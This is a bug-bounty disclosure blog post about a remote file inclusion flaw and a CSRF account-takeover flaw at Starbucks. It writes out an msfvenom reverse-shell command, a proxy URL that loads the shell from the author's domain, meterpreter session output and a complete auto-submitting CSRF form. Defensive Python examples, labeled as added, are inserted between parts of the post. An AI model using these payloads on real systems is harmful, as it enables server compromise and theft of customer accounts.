Hello Everyone!
How I Hacked Starbucks?
Today I will show you how I discovered several critical security vulnerabilities at Starbucks. They could have a very harmful impact on all users: forcing users to change their passwords, add alternative emails or change anything else in their store profile settings, and stealing users' stored credit cards. They also allowed phishing attacks against users and remote code execution on Starbucks servers.
Story:
One year ago there was a zero-day for the Starbucks iOS mobile application: an "Insecure Data Storage" vulnerability. While searching for Starbucks hacking news I found that two months ago there was another vulnerability which allowed attackers to steal Starbucks users' gift cards and duplicate funds on Starbucks gift cards. I also noticed two months ago that Starbucks had joined a bug bounty program. So my passion led me to take a look at Starbucks, looking for vulnerabilities, until I found two major critical vulnerabilities: one allows an attacker to perform remote code execution on a Starbucks server as well as phishing attacks via a Remote File Inclusion vulnerability, and the other, also critical, is a CSRF store account takeover with just one click. A Starbucks store account contains payment history.
News URLs:
http://www.bbc.co.uk/news/technology-32844123
http://www.cnbc.com/2015/05/13/hackers-target-starbucks-gift-cardholders.html
Reconnaissance:
Reconnaissance is the main key to finding good vulnerabilities. I started by looking up Starbucks subdomains; as we all know, there are a lot of tools that can do this, but this time I used the "wolframalpha.com" website to get a list of Starbucks subdomains. One of these subdomains was "quality.starbucks.com", so I decided to start with that subdomain and look for sub-directories using the Burp Suite engagement tools (Discover Content) until I found the URL below:
Burp Suite engagement tools (Discover Content)
http://quality.starbucks.com/admin/api/outside/proxy?url=
Vulnerabilities:
1. Remote File Inclusion Vulnerability: this occurs when a file from any location can be injected into the attacked page and included as source code for parsing and execution. It allowed me to perform:
- Code execution on the web server.
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS).
- Data theft/manipulation via a phishing attack to steal user accounts that contain credit card and payment order information.
Vulnerable URL : http://quality.starbucks.com/admin/api/outside/proxy?url= <Payload Here>
Whatever is supplied in the URL parameter is fetched and loaded inside a quality.starbucks.com page, so I created a PoC for XSS via an HTML page and executed it as in the screenshot below:
Figure 1 - Cross Site-Scripting via Remote File Inclusion
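For the defensive side of the proxy endpoint above, here is an added example (not code from the post, Starbucks or Demandware) of the check a server-side fetch/proxy endpoint should apply to a caller-supplied URL before retrieving anything. The host names in ALLOWED_HOSTS are assumed placeholders for the internal services such an endpoint is actually meant to reach.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Assumed allowlist: the only hosts the proxy endpoint legitimately needs to reach.
ALLOWED_HOSTS = {"api.internal.example", "reports.internal.example"}
ALLOWED_SCHEMES = {"https"}


def is_allowed_proxy_target(url: str) -> bool:
    """Return True only if `url` names an allowlisted host over HTTPS.

    Everything else is refused, including the shapes that turn an open
    fetch/proxy endpoint into a remote-file-inclusion or SSRF primitive:
    non-HTTPS schemes, bare host/path strings, userinfo tricks such as
    https://api.internal.example@evil.example/, IP literals, non-standard
    ports and percent-encoded host names that decode to something else.
    """
    if not isinstance(url, str) or len(url) > 2048:
        return False
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    if parts.username is not None or parts.password is not None:
        return False  # "allowed-host@real-host" trick
    host = parts.hostname  # already lower-cased; IPv6 brackets stripped
    if not host or unquote(host) != host:
        return False  # empty host, or %-encoding hiding the real name
    try:
        ipaddress.ip_address(host)
        return False  # IP literal: the allowlist is by name only
    except ValueError:
        pass  # not an IP literal, carry on with the name check
    if port not in (None, 443):
        return False
    return host in ALLOWED_HOSTS
```

Allowlisting the target is the primary fix; the fetched body should additionally be returned with a fixed, non-HTML content type so that nothing retrieved is ever rendered as a page under the site's own origin.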
So now I was able to inject any script and have it executed on the quality.starbucks.com domain, so it was time to perform remote code execution on the Starbucks server. I created an ASP reverse shell with msfvenom using the command below:
msfvenom -p windows/x86/shell_reverse_tcp LHOST=<IP Address> LPORT=<Port to Connect On> -f asp > shell.asp
IP Address : I used my static IP address.
Port : I used port 80 and enabled port forwarding for port 80 on my router.
I uploaded my ASP reverse shell to my domain, then I used the HTTP URL as below:
http://www.quality.starbucks.com/admin/api/outside/proxy?url=<My_Domain_Name>/shell.asp
I used exploit/multi/handler in Metasploit with the payload windows/x86/shell_reverse_tcp.
Then I set the payload attributes:
- LHOST: my internal network IP address, the one configured in my router's port forwarding.
- LPORT : 80
- ExitOnSession : False
Now it was time to exploit...
The exploit started and was listening... after requesting the URL above with the ASP reverse shell, I got a session opened :D
[*] Sending stage (751104 bytes) to 52.27.100.241
[*] Sending stage (751104 bytes) to 104.152.186.243
[*] Meterpreter session 1 opened (192.168.1.105:80 -> 52.27.100.241:1385) at 2015-29-07 22:57:49 +0200
Figure 2 - Session Opened / Remote Code Execution Succeeded
2. Starbucks Store Account Take-Over CSRF Vulnerability: An attacker can send a malicious link that forces the victim to change their store account information, including the account password, so the attacker can also steal the credit stored in the victim's account.
URL : https://store.starbucks.com/
Payload :
==========
<html>
<body onload="document.csrf.submit()">
<form action="https://store.starbucks.com/on/demandware.store/Sites-Starbucks-Site/default/MyAccount-EditProfileAjax" method="post" name="csrf">
<input type="hidden" name="dwfrm_profile_customer_firstname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_lastname" value="attacker"><br>
<input type="hidden" name="dwfrm_profile_customer_email" value="attacker@gmail.com"><br>
<input type="hidden" name="dwfrm_profile_login_password" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_passwordconfirm" value="hacked@2015"><br>
<input type="hidden" name="dwfrm_profile_login_question" value=""><br>
<input type="hidden" name="dwfrm_profile_login_answer" value=""><br>
<input type="hidden" name="dwfrm_profile_customer_emailsource" value="Website+-+Registration"><br>
<input type="hidden" name="newpwsubmitted" value="true"><br>
</form>
</body>
</html>
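As the defensive counterpart to the cross-site form above, here is an added example (not code from the post, Starbucks or Demandware) of the guard a profile-edit endpoint needs so that a form auto-submitted from another site is refused: an Origin/Referer check plus a per-session anti-CSRF token that the attacker's page cannot know. SITE_ORIGIN, SECRET_KEY and the session ids are assumed values; CROSS_SITE_POST is constructed from the field names in the payload above.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SECRET_KEY = secrets.token_bytes(32)   # assumed per-deployment server secret
SITE_ORIGIN = "https://store.example"  # assumed stand-in for the store host

# Constructed: the fields a cross-site form like the one above would post.
# It carries the victim's session cookie automatically, but no token.
CROSS_SITE_POST = {
    "dwfrm_profile_login_password": "hacked@2015",
    "dwfrm_profile_login_passwordconfirm": "hacked@2015",
    "newpwsubmitted": "true",
}


def csrf_token_for(session_id: str) -> str:
    """Derive the token from the session id so one user's token is useless for another."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_trusted_origin(headers: dict) -> bool:
    """Browsers attach Origin (or at least Referer) to cross-site form posts,
    so a request from any page outside the site is refused before the token check."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if not referer:
            return False  # neither header: treat as untrusted
        p = urlsplit(referer)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == SITE_ORIGIN


def accept_profile_edit(session_id: str, headers: dict, form: dict) -> bool:
    """Guard for a state-changing endpoint: same-origin AND a token bound to the session.
    The session cookie alone, which the browser sends with the forged post, is never enough."""
    if not is_trusted_origin(headers):
        return False
    submitted = form.get("csrf_token", "")
    expected = csrf_token_for(session_id)
    return hmac.compare_digest(submitted.encode(), expected.encode())
```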
Proof-Of-Concept Video:
Time Line:
Vulnerability Discovery: 29/Jun/2015
Vulnerability Reported: 29/Jun/2015
No reply from the Starbucks security team, so I contacted Starbucks customer support on Twitter on 04/July/2015, also with no reply.
Reported to US-CERT : 01 July 2015.
US-CERT Reply Date : 08 July 2015.
Figure 3 - US-CERT First Reply
I got a second reply from US-CERT confirming the Starbucks vulnerabilities.
US-CERT Second Reply : 20 Aug 2015
Figure 4 - Starbucks Vulnerabilities Confirmation
The vulnerabilities were fixed 10 days ago and I am still waiting for a reply from Starbucks, as per US-CERT's latest reply:
Figure 5 - Waiting for a reply from Starbucks about reward and publication.
Conclusion:
Starbucks Security Manager Reward Reply : 21 SEP 2015
Figure 6 - Starbucks bounty reply ($2,000)
Thanks for reading :) Hope you enjoyed it... :D
About Author:
I'm Mohamed M. Fouad, Information Security Engineer / Consultant at SecureMisr and an independent security researcher from Egypt with more than 5 years of experience in web and mobile application development, penetration testing, secure coding, network penetration testing, security code auditing and incident response. I have conducted vulnerability assessments and penetration tests for many high-profile companies and banks across the Middle East. In addition, I have worked as a freelancer with multinational companies, e.g. Monster Recruitment...
I have received acknowledgements from many firms, such as:
Microsoft, Oracle, Yahoo, eBay, Sony, WordPress, ESET, BitDefender, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise and so many more...
Comment: What led you to try these URL approaches? Great catches BTW :-)